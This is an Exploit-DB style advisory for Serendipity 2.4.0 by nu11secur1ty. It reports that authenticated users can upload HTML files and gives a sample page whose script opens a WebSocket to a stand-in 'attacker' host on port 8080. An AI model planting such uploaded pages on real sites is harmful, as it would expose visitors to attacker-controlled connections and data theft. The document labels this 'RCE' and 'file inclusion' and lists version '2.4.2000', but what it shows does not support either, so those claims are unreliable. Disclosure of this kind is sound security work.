Serendipity 2.4.0 - File Inclusion RCE

vendor:

Serendipity

by:

nu11secur1ty

7.5

CVSS

HIGH

File Inclusion RCE

CWE

Product Name: Serendipity

Affected Version From: 2.4.2000

Affected Version To: 2.4.2000

Patch Exists:

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2023

Serendipity 2.4.0 – File Inclusion RCE

The already authenticated attacker can upload HTML files on the server, which is absolutely dangerous and STUPID. In this file, the attacker can be codding a malicious web-socket responder that can connect with some nasty webserver somewhere. It depends on the scenario, the attacker can steal every day very sensitive information, for a very long period of time, until the other users will know that something is not ok with this system, and they decide to stop using her, but maybe they will be too late for this decision.

Mitigation:

Source

Exploit-DB raw data:

## Exploit Title: Serendipity 2.4.0 - File Inclusion RCE
## Author: nu11secur1ty
## Date: 04.26.2023
## Vendor: https://docs.s9y.org/index.html
## Software: https://github.com/s9y/Serendipity/releases/tag/2.4.0
## Reference: https://portswigger.net/web-security/file-upload
## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

## Description:
The already authenticated attacker can upload HTML files on the
server, which is absolutely dangerous and STUPID
In this file, the attacker can be codding a malicious web-socket
responder that can connect with some nasty webserver somewhere. It
depends on the scenario, the attacker can steal every day very
sensitive information, for a very long period of time, until the other
users will know that something is not ok with this system, and they
decide to stop using her, but maybe they will be too late for this
decision.

STATUS: HIGH Vulnerability

[+]Exploit:
```HTML
<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<title>NodeJS WebSocket Server</title>
</head>
<body>
	<h1>You have just sent a message to your attacker,<br>
	<h1>that you are already connected to him.</h1>
<script>
const ws = new WebSocket("ws://attacker:8080");
ws.addEventListener("open", () =>{
  console.log("We are connected to you");
  ws.send("How are you, dear :)?");
});

ws.addEventListener('message', function (event) {
    console.log(event.data);
});
</script>
</body>
</html>

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/s9y/2023/Serendipity-2.4.0)

## Proof and Exploit:
[href](https://streamable.com/2s80z6)

## Time spend:
01:27:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=nu11secur1ty <http://nu11secur1ty.com/>